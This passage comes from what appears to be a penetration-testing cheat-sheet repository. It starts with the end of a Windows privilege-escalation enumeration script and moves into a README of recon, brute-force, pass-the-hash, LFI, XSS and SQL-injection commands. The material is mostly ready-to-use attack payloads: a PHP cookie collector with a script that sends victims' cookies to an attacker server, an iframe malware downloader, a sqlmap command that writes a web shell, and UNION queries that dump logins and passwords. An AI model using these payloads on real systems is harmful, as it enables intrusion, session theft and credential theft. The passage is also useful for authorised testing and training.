errorlevel 1 ( 313 | 314 | echo MS06-030 patch is installed :( 315 | 316 | ) ELSE ( 317 | 318 | echo MS06-030 patch is NOT installed! 319 | 320 | ) 321 | 322 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" | find /i "KB908523" 1>NUL 323 | IF not errorlevel 1 ( 324 | 325 | echo MS05-055 patch is installed :( 326 | 327 | ) ELSE ( 328 | 329 | echo MS05-055 patch is NOT installed! 330 | 331 | ) 332 | 333 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" | find /i "KB890859" 1>NUL 334 | IF not errorlevel 1 ( 335 | 336 | echo MS05-018 patch is installed :( 337 | 338 | ) ELSE ( 339 | 340 | echo MS05-018 patch is NOT installed! 341 | 342 | ) 343 | 344 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" | find /i "KB842526" 1>NUL 345 | IF not errorlevel 1 ( 346 | 347 | echo MS04-019 patch is installed :( 348 | 349 | ) ELSE ( 350 | 351 | echo MS04-019 patch is NOT installed! 352 | 353 | ) 354 | 355 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" | find /i "KB835732" 1>NUL 356 | IF not errorlevel 1 ( 357 | 358 | echo MS04-011 patch is installed :( 359 | 360 | ) ELSE ( 361 | 362 | echo MS04-011 patch is NOT installed! 363 | 364 | ) 365 | 366 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" | find /i "KB841872" 1>NUL 367 | IF not errorlevel 1 ( 368 | 369 | echo MS04-020 patch is installed :( 370 | 371 | ) ELSE ( 372 | 373 | echo MS04-020 patch is NOT installed! 374 | 375 | ) 376 | 377 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" | find /i "KB2975684" 1>NUL 378 | IF not errorlevel 1 ( 379 | 380 | echo MS14-040 patch is installed :( 381 | 382 | ) ELSE ( 383 | 384 | echo MS14-040 patch is NOT installed! 385 | 386 | ) 387 | 388 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" | find /i "KB3136041" 1>NUL 389 | IF not errorlevel 1 ( 390 | 391 | echo MS16-016 patch is installed :( 392 | 393 | ) ELSE ( 394 | 395 | echo MS16-016 patch is NOT installed! 396 | 397 | ) 398 | 399 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" | find /i "KB3057191" 1>NUL 400 | IF not errorlevel 1 ( 401 | 402 | echo MS15-051 patch is installed :( 403 | 404 | ) ELSE ( 405 | 406 | echo MS15-051 patch is NOT installed! 407 | 408 | ) 409 | 410 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" | find /i "KB2989935" 1>NUL 411 | IF not errorlevel 1 ( 412 | 413 | echo MS14-070 patch is installed :( 414 | 415 | ) ELSE ( 416 | 417 | echo MS14-070 patch is NOT installed! 418 | 419 | ) 420 | 421 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2503665" | find /i "KB2503665" 1>NUL 422 | IF not errorlevel 1 ( 423 | 424 | echo MS11-046 patch is installed :( 425 | 426 | ) ELSE ( 427 | 428 | echo MS11-046 patch is NOT installed! 429 | 430 | ) 431 | 432 | @echo on 433 | 434 | rem #-------------------------# 435 | rem # File Transfer Utilities # 436 | rem #-------------------------# 437 | 438 | @echo off 439 | 440 | cscript /? 441 | powershell.exe /? 442 | tftp /? 443 | 444 | @echo on 445 | 446 | rem #-----------------------------# 447 | rem # Clear-text/base64 Passwords # 448 | rem #-----------------------------# 449 | 450 | @echo off 451 | 452 | type c:\sysprep.inf 453 | type c:\sysprep\sysprep.xml 454 | type %WINDIR%\Panther\Unattend\Unattended.xml 455 | type %WINDIR%\Panther\Unattended.xml 456 | dir /s *pass* 457 | dir /s *cred* 458 | dir /s *vnc* 459 | dir /s *.config 460 | 461 | @echo on 462 | 463 | rem #--------------# 464 | rem # Backup Files # 465 | rem #--------------# 466 | 467 | @echo off 468 | 469 | dir /s *backup* 470 | 471 | @echo on 472 | 473 | rem #----------------------------------# 474 | rem # *.MSI Install - SYSTEM privilege # 475 | rem #----------------------------------# 476 | 477 | @echo off 478 | 479 | rem This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1. 480 | rem This setting will allow low privilege user to install any .MSI as system! 481 | 482 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 483 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 484 | 485 | @echo on 486 | 487 | rem #------------------------# 488 | rem # Unquoted Service Paths # 489 | rem #------------------------# 490 | 491 | @echo off 492 | 493 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 494 | 495 | rem All commands from this point onward will require accesschk.exe 496 | rem Make sure you have accesschk.exe(old version) in same directory when you run the script! 497 | 498 | @echo on 499 | 500 | rem #---------------------# 501 | rem # Vulnerable Services # 502 | rem #---------------------# 503 | 504 | @echo off 505 | 506 | rem By default WinXP SP1 grant "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"! 507 | 508 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 509 | accesschk.exe /accepteula -uwcqv "Power Users" * 510 | accesschk.exe /accepteula -uwcqv "Users" * 511 | 512 | @echo on 513 | 514 | rem #-------------------------------# 515 | rem # Vulnerable Folder Permissions # 516 | rem #-------------------------------# 517 | 518 | @echo off 519 | 520 | accesschk.exe /accepteula -uwdqs "Users" c:\ 521 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 522 | 523 | @echo on 524 | 525 | rem #-----------------------------# 526 | rem # Vulnerable File Permissions # 527 | rem #-----------------------------# 528 | 529 | @echo off 530 | 531 | accesschk.exe /accepteula -uwqs "Users" c:\*.* 532 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 533 | 534 | @echo on 535 | 536 | rem #----------------# 537 | rem # Happy Hunting! # 538 | rem #----------------# 539 | 540 | @echo off 541 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | <p align="center"> 2 | <img src="https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/blob/master/CheatSheets/28533648.png" alt="Pentest Cheat Sheets" width="300" /> 3 | </p> 4 | 5 | # Pentest-Cheat-Sheets 6 | This repo has a collection of snippets of codes and commands to help our lives! 7 | The main purpose is not be a crutch, this is a way to do not waste our precious time! 8 | This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework. 9 | 10 | ## Ninja Tricks 11 | 12 | - [Recon](#recon) 13 | - [DNS](#dns) 14 | - [SPF](#spf-recon) 15 | - [Nmap](#nmap) 16 | - [NetCat](#netcat) 17 | - [SNMP](#SNMP) 18 | - [Mysql](#mysql) 19 | - [MS SQL](#ms-sql) 20 | - [Web Enumeration](#web-enumeration) 21 | - [Exploitation](#exploitation) 22 | - [System Network](#system-network) 23 | - [RDP](#rdp) 24 | - [Pass The Hash](#pass-the-hash) 25 | - [Windows-Shell](#windows-shell) 26 | - [Web Application](#web-application) 27 | - [Web Remote Code Execution](#web-remote-code-execution) 28 | - [LFI](#lfi) 29 | - [encode](#encode) 30 | - [XSS](#xss) 31 | - [SQLi](#sqli) 32 | - [sqlmap](#sqlmap) 33 | - [Bare Hands](#bare-hands) 34 | - [Jekins](#jekins) 35 | - [Post-exploitation](#post-exploitation) 36 | - [Reverse Shell](#reverse-shell) 37 | - [PHP Reverse Shell](#php-reverse-shell) 38 | - [Perl Reverse Shell](#perl-reverse-shell) 39 | - [python Reverse Shell](#python-reverse-shell) 40 | - [Ruby Reverse Shell](#ruby-reverse-shell) 41 | - [bash Reverse Shell](#bash-reverse-shell) 42 | - [powershell Reverse Sheel](#powershell-reverse=shell) 43 | - [Java Reverse Sheel](#java-reverse=shell) 44 | - [Xterm Reverse Sheel](#xterm-reverse=shell) 45 | - [Linux](#linux) 46 | - [Linux Privilege Escalation](#linux-privilege-escalation) 47 | - [Data Haversting and Enumeration](#data-harvesting-enumeration) 48 | - [Linux Pivot](#linux-pivot) 49 | - [Sshutle](#sshutle) 50 | - [VPNPivot](#vpn-pivot) 51 | - [SSH Tunneling](#ssh-tunneling) 52 | - [Linux Backdoring](#linux-backdoring) 53 | - [Windows](#Windows) 54 | - [Windows Enumeration](#windows-enumeration) 55 | - [Windows Privilege Escalation](#windows-privilege-escalation) 56 | - [Hashdump](#hashdump) 57 | - [Transferring Files Without Metasploit](#transferring-files-without-metasploit) 58 | - [Backdoring](#windows-backdoring) 59 | - [Windows Pivot](#windows-pivot) 60 | - [Openssh for Tunneling](#openssh-for-tunneling) 61 | - [Plink](#plink) 62 | - [Resources](#resources) 63 | - [HTTP/HTTPS Servers](#http-server) 64 | - [Wordlist](#wordlist) 65 | - [seclist](#seclist) 66 | - [cotse](#cotse) 67 | - [PacketStorm](#packetstorm) 68 | - [Default Passwords](#default-passwords) 69 | - [Default Passoword](#default-password) 70 | - [Router Password](#Router-password) 71 | - [Leak](#leak) 72 | - [Pastebin](#pastebin) 73 | - [Tables](#tables) 74 | - [Contribution](#contribution) 75 | 76 | # Recon 77 | 78 | ## DNS 79 | 80 | ### Nslookup 81 | 82 | Resolve a given hostname to the corresponding IP. 83 | 84 | ```shell 85 | nslookup targetorganization.com 86 | ``` 87 | 88 | ### Reverse DNS lookup 89 | 90 | ```shell 91 | nslookup -type=PTR IP_address 92 | ``` 93 | 94 | ### MX(Mail Exchange) lookup 95 | 96 | ```shell 97 | nslookup -type=MX domain 98 | ``` 99 | 100 | ### Zone Transfer 101 | 102 | #### Using nslookup Command 103 | 104 | ```shell 105 | nslookup 106 | server domain.com 107 | ls -d domain.com 108 | ``` 109 | #### Using HOST Command 110 | 111 | host -t ns(Name Server) < domain > 112 | 113 | ```shell 114 | host -t ns domain.com 115 | ``` 116 | 117 | after that test nameservers 118 | 119 | host -l < domain > < nameserver > 120 | 121 | ```shell 122 | host -l domain.com ns2.domain.com 123 | ``` 124 | 125 | ### Nmap Dns Enumaration 126 | 127 | ``` 128 | nmap -F --dns-server <dns server ip> <target ip range> 129 | ``` 130 | 131 | ### Auto tools 132 | 133 | #### DNSenum 134 | 135 | ``` 136 | dnsenum targetdomain.com 137 | ``` 138 | 139 | ``` 140 | dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com 141 | ``` 142 | 143 | #### DNSmap 144 | 145 | ```bash 146 | targetdomain.com 147 | ``` 148 | 149 | ```bash 150 | dnsmap targetdomain.com -w <Wordlst file.txt> 151 | ``` 152 | 153 | Brute Force, the file is saved in /tmp 154 | 155 | ```bash 156 | dnsmap targetdomain.com -r 157 | ``` 158 | 159 | #### DNSRecon DNS Brute Force 160 | 161 | ```bash 162 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 163 | ``` 164 | 165 | #### Fierce.pl 166 | 167 | ``` 168 | fierce -dns targetdomain.com 169 | ``` 170 | 171 | #### HostMap 172 | 173 | ``` 174 | hostmap.rb -only-passive -t <IP> 175 | ``` 176 | 177 | We can use -with-zonetransfer or -bruteforce-level 178 | 179 | ## 180 | 181 | ## SPF Recon 182 | 183 | ### Dig SPF txt 184 | 185 | ```bash 186 | dig txt target.com 187 | ``` 188 | #### Dmarc 189 | 190 | ```bash 191 | dig TXT _dmarc.example.org 192 | ``` 193 | 194 | #### Online Tools 195 | 196 | * https://dnsdumpster.com/ 197 | * https://network-tools.com/nslook/ 198 | * https://www.dnsqueries.com/en/ 199 | * https://mxtoolbox.com/ 200 | 201 | ## 202 | 203 | ## Nmap 204 | 205 | Set the ip address as a varible 206 | 207 | `export ip=192.168.1.100` 208 | `export netw=192.168.1.0/24` 209 | 210 | ### Detecting Live Hosts 211 | 212 | Only Ip's 213 | 214 | ```shell 215 | nmap -sn -n $netw | grep for | cut -d" " -f5 216 | ``` 217 | 218 | ### Stealth Scan 219 | 220 | ```shell 221 | nmap -sS $ip 222 | ``` 223 | 224 | Only Open Ports and Banner Grab 225 | 226 | ```shell 227 | nmap -n -Pn -sS $ip --open -sV 228 | ``` 229 | 230 | Stealth scan using FIN Scan 231 | 232 | ```shell 233 | map -sF $ip 234 | ``` 235 | 236 | ### Agressive scan 237 | 238 | Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports 239 | 240 | ```shell 241 | nmap -n -Pn -sS -A $ip --open -p- 242 | ``` 243 | 244 | Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services 245 | 246 | ```shell 247 | nmap –v –sS –A –T4 $ip 248 | ``` 249 | 250 | ### OS FigerPrint 251 | 252 | ```shell 253 | nmap -O $ip 254 | ``` 255 | 256 | ### Quick Scan 257 | 258 | ```shell 259 | nmap -T4 -F $netw 260 | ``` 261 | 262 | ### Quick Scan Plus 263 | 264 | ```shell 265 | nmap -sV -T4 -O -F --version-light $netw 266 | ``` 267 | 268 | ### output to a file 269 | 270 | ```shell 271 | nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip 272 | ``` 273 | 274 | ### output to a file Plus 275 | 276 | ```shell 277 | nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw 278 | ``` 279 | 280 | ### Search NMAP scripts 281 | 282 | ```shell 283 | ls /usr/share/nmap/scripts/ | grep ftp 284 | ``` 285 | 286 | * [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html) 287 | 288 | 289 | ## 290 | 291 | ## NetCat 292 | 293 | ### Port Scanner 294 | 295 | One port 296 | 297 | ```shell 298 | nc -nvz 192.168.1.23 80 299 | ``` 300 | 301 | Port Range 302 | 303 | ```shell 304 | nc -vnz 192.168.1.23 0-1000 305 | ``` 306 | 307 | ### Send files 308 | 309 | * Server 310 | 311 | ```shell 312 | nc -lvp 1234 > file_name_to_save 313 | ``` 314 | 315 | * Client 316 | 317 | ```shell 318 | nc -vn 192.168.1.33 1234 < file_to_send 319 | ``` 320 | 321 | ### Executing remote script 322 | 323 | * Server 324 | 325 | ```shell 326 | nc -lvp 1234 -e ping.sh <IP> 327 | ``` 328 | 329 | * Client 330 | 331 | ```shell 332 | nc -vn 192.168.1.33 1234 333 | ``` 334 | 335 | ### Chat with encryption 336 | 337 | * Server 338 | 339 | ```shell 340 | ncat -nlvp 8000 --ssl 341 | ``` 342 | 343 | * Client 344 | 345 | ```shell 346 | ncat -nv 192.168.1.33 8000 347 | ``` 348 | 349 | ### Banner Grabbing 350 | 351 | * Request 352 | 353 | ```shell 354 | nc target port 355 | HTTP_Verb path http/version 356 | Host: url 357 | ``` 358 | 359 | * Response 360 | 361 | ```shell 362 | nc www.bla.com.br 80 363 | HEAD / HTTP/1.0 364 | Host: www.bla.com.br 365 | ``` 366 | 367 | ### If this site uses https you need to use openssl 368 | 369 | ```shell 370 | penssl s_client -quiet www.bla.com.br:443 371 | ``` 372 | 373 | ## 374 | 375 | ## SNMP 376 | 377 | ### Fixing SNMP output 378 | 379 | ```shell 380 | apt-get install snmp-mibs-downloader download-mibs 381 | ``` 382 | 383 | ```shell 384 | echo "" > /etc/snmp/snmp.conf 385 | ``` 386 | 387 | ### OneSixtyone 388 | 389 | onesixtyone -c COMMUNITY_FILE -i Target_ip 390 | 391 | ```shell 392 | onesixtyone -c community.txt -i Found_ips.txt 393 | ``` 394 | 395 | ### snmpwalk 396 | 397 | Walking MIB's 398 | 399 | snmpwalk -c COMMUNITY -v VERSION target_ip 400 | 401 | ```shell 402 | snmpwalk -c public -v1 192.168.25.77 403 | ``` 404 | 405 | specific MIB node 406 | snmpwalk -c community -v version Target IP MIB Node 407 | Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 408 | 409 | ```shell 410 | snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 411 | ``` 412 | 413 | ### snmp-check 414 | 415 | snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY 416 | 417 | ```shell 418 | snmp-check -t 172.20.10.5 419 | ``` 420 | 421 | ```shell 422 | snmp-check -t 172.20.10.5 -c public 423 | ``` 424 | 425 | ### Automate the username enumeration process for SNMPv3 426 | 427 | ```shell 428 | apt-get install snmp snmp-mibs-downloader 429 | ``` 430 | 431 | ```shell 432 | wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb 433 | ``` 434 | 435 | ### NMAP SNMPv3 Enumeration 436 | 437 | ```shell 438 | nmap -sV -p 161 --script=snmp-info 172.20.10.0/24 439 | ``` 440 | 441 | ### Default Credentials 442 | 443 | ```shell 444 | /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 445 | ``` 446 | 447 | ## 448 | 449 | ## MYSQL 450 | 451 | ### Try remote default Root access 452 | 453 | Mysql Open to wild 454 | 455 | ```shell 456 | mysql -h Target_ip -u root -p 457 | ``` 458 | 459 | ## MSSQL 460 | 461 | ### MSQL Information Gathering 462 | 463 | ``` 464 | nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip 465 | ``` 466 | 467 | ## Web Enumeration 468 | 469 | ### Dirsearch 470 | 471 | ```shell 472 | dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old 473 | ``` 474 | 475 | ```shell 476 | dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist 477 | ``` 478 | 479 | ```shell 480 | dirsearch -u https://target.com -e . 481 | ``` 482 | ### dirb 483 | 484 | ```shell 485 | dirb http://target.com /path/to/wordlist 486 | ``` 487 | 488 | ```shell 489 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 490 | ``` 491 | 492 | ### Gobuster 493 | 494 | ```shell 495 | gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt 496 | ``` 497 | 498 | ## 499 | 500 | # Exploitation 501 | 502 | ## System Network 503 | 504 | ## RDP 505 | 506 | ### xfreerdp 507 | 508 | ##### Simple User Enumeration for Windows Target (kerberos based) 509 | 510 | xfreerdp /v:<target_ip> -sec-nla /u:"" 511 | 512 | ``` 513 | xfreerdp /v:192.168.0.32 -sec-nla /u:"" 514 | ``` 515 | 516 | ### login 517 | 518 | xfreerdp /u:<user> /g:<domain> /p:<pass> /v:<target_ip> 519 | 520 | ``` 521 | xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 522 | ``` 523 | 524 | #### Wordlist based bruteforce 525 | 526 | ### NCRACK 527 | 528 | ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389 529 | 530 | ``` 531 | ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389 532 | ``` 533 | 534 | ### Crowbar 535 | 536 | crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v 537 | 538 | ``` 539 | crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v 540 | ``` 541 | 542 | ## Pass the hash 543 | 544 | ### Smb pass the hash 545 | 546 | #### Tool: 547 | 548 | [pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) 549 | 550 | 551 | ### Listing shared folders 552 | 553 | sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 -L <target_ip> \\\\<target_ip>\\ <hash> 554 | 555 | ``` 556 | sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad 557 | ``` 558 | 559 | ### Interactive smb shell 560 | 561 | sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 \\\\<target_ip>\\shared_folder <hash> 562 | 563 | ``` 564 | sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad 565 | ``` 566 | 567 | ## Web Application 568 | 569 | ### Web Remote code 570 | 571 | 572 | ### LFI (Local File Inclusion) 573 | 574 | Situation 575 | 576 | ``` 577 | http://<target>/index.php?parameter=value 578 | ``` 579 | 580 | #### How to Test 581 | 582 | ``` 583 | http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index 584 | ``` 585 | 586 | ``` 587 | http://<target>/script.php?page=../../../../../../../../etc/passwd 588 | 589 | ``` 590 | 591 | ``` 592 | http://<target>/script.php?page=../../../../../../../../boot.ini 593 | ``` 594 | 595 | #### LFI Payloads 596 | 597 | * [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 598 | * [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 599 | 600 | ### encode 601 | 602 | 603 | 604 | ## XSS 605 | 606 | ### Reflected 607 | 608 | #### Simple test 609 | This is a simple test to see what happens, this is not a prove that the field is vuln to xss 610 | 611 | ```javascript 612 | <plaintext> 613 | ``` 614 | 615 | #### Simple XSS test 616 | 617 | ```javascript 618 | <script>alert('Found')</script> 619 | ``` 620 | 621 | ```javascript 622 | "><script>alert(Found)</script>"> 623 | ``` 624 | 625 | ```javascript 626 | <script>alert(String.fromCharCode(88,83,83))</script> 627 | ``` 628 | 629 | #### Bypass filter of tag script 630 | 631 | `" onload="alert(String.fromCharCode(88,83,83))` 632 | 633 | ```javascript 634 | " onload="alert('XSS') 635 | ``` 636 | 637 | bla is not a valid image, so this cause an error 638 | 639 | ```javascript 640 | <img src='bla' onerror=alert("XSS")> 641 | ``` 642 | 643 | ### Persistent 644 | 645 | ```javascript 646 | >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>"; 647 | ```` 648 | 649 | ### PHP collector 650 | 651 | `> cookie.txt` 652 | `chmod 777 cookie.txt` 653 | 654 | edit a php page like colector.php as follow: 655 | 656 | ```php 657 | <?php 658 | $cookie=GET['cookie']; 659 | $useragent=$_SERVER['HTTP_USER_AGENT']; 660 | $file=fopen('cookie.txt', 'a'); 661 | fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); 662 | fclose($file); 663 | ?> 664 | ``` 665 | 666 | Script to put in page: 667 | 668 | ```javascript 669 | <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> 670 | ``` 671 | 672 | #### Malware Donwloader via XSS 673 | 674 | ```javascript 675 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 676 | ``` 677 | 678 | #### How to play Mario with XSS 679 | 680 | ```javascript 681 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 682 | ``` 683 | 684 | ```javascript 685 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 686 | ``` 687 | 688 | #### XSS payloads 689 | 690 | * [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 691 | * [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 692 | 693 | 694 | ## SQLI 695 | 696 | Sql Injection 697 | 698 | ### Sqlmap 699 | 700 | #### GET 701 | 702 | #### Error-Based 703 | 704 | #### Simple test 705 | 706 | `Adding a simpe quote '` 707 | 708 | Example: 709 | ```javascript 710 | http://192.168.1.104/Less-1/?id=5' 711 | ```` 712 | 713 | #### List databases 714 | 715 | 716 | ```bash 717 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs 718 | ``` 719 | #### List tables 720 | 721 | 722 | ```bash 723 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables 724 | ``` 725 | 726 | #### List columns 727 | 728 | ```bash 729 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --columns 730 | ``` 731 | 732 | #### Dump all 733 | 734 | ```bash 735 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-all 736 | ``` 737 | 738 | #### Set Cookie 739 | 740 | ```bash 741 | ./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs 742 | ``` 743 | 744 | #### Checking Privileges 745 | 746 | ```bash 747 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE 748 | ``` 749 | 750 | #### Reading file 751 | 752 | ```bash 753 | ./sqlmap.py -u <URL> --file-read=<file to read> 754 | ``` 755 | 756 | ```bash 757 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd 758 | ``` 759 | 760 | #### Writing file 761 | 762 | ``` 763 | ./sqlmap.py -u <url> --file-write=<file> --file-dest=<path> 764 | ``` 765 | 766 | ``` 767 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php 768 | ``` 769 | 770 | #### POST 771 | 772 | ```bash 773 | ./sqlmap.py -u <POST-URL> --data="<POST-paramters> " 774 | ``` 775 | 776 | ```bash 777 | ./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname 778 | ``` 779 | 780 | You can also use a file like with the post request: 781 | 782 | ```bash 783 | ./sqlmap.py -r post-request.txt -p uname 784 | ``` 785 | 786 | ### Bare Hands 787 | 788 | #### GET 789 | 790 | #### Error-Based 791 | 792 | #### Simple test 793 | 794 | `Adding a simpe quote '` 795 | 796 | Example: 797 | 798 | ``` 799 | http://192.168.1.104/Less-1/?id=5' 800 | ``` 801 | 802 | #### Fuzzing 803 | 804 | Sorting columns to find maximum column 805 | 806 | `http://192.168.1.104/Less-1/?id=-1 order by 1` 807 | 808 | `http://192.168.1.104/Less-1/?id=-1 order by 2` 809 | 810 | `http://192.168.1.104/Less-1/?id=-1 order by 3` 811 | 812 | (until it stop returning errors) 813 | 814 | --- 815 | 816 | #### Finding what column is injectable 817 | 818 | **mysql** 819 | 820 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3` 821 | 822 | (using the same amount of columns you got on the previous step) 823 | 824 | **postgresql** 825 | 826 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL` 827 | 828 | (using the same amount of columns you got on the previous step) 829 | 830 | one of the columns will be printed with the respective number 831 | 832 | --- 833 | 834 | #### Finding version 835 | 836 | **mysql** 837 | 838 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()` 839 | 840 | **postgres** 841 | 842 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()` 843 | 844 | 845 | #### Finding database name 846 | 847 | **mysql** 848 | 849 | `http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()` 850 | 851 | **postgres** 852 | 853 | `http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database()` 854 | 855 | 856 | #### Finding usernames logged in 857 | 858 | **mysql** 859 | 860 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()` 861 | 862 | 863 | #### Finding databases 864 | 865 | **mysql** 866 | 867 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` 868 | 869 | **postgres** 870 | 871 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database` 872 | 873 | #### Finding table names from a database 874 | 875 | **mysql** 876 | 877 | ``` 878 | http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name" 879 | ``` 880 | 881 | **postgres** 882 | 883 | ``` 884 | http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name" 885 | ``` 886 | 887 | #### Finding column names from a table 888 | 889 | **mysql** 890 | 891 | ``` 892 | http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename" 893 | ``` 894 | **postgres** 895 | 896 | ``` 897 | http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename" 898 | ``` 899 | 900 | #### Concatenate 901 | 902 | Example: 903 | 904 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;` 905 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;` 906 | 907 | in one query 908 | 909 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql** 910 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres** 911 | 912 | 913 | ### Error Based SQLI (USUALLY MS-SQL) 914 | 915 | #### Current user 916 | 917 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--` 918 | 919 | 920 | #### DBMS version 921 | 922 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--` 923 | 924 | 925 | #### Database name 926 | 927 | `http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --` 928 | 929 | 930 | #### Tables from a database 931 | 932 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--` 933 | 934 | --- 935 | 936 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as 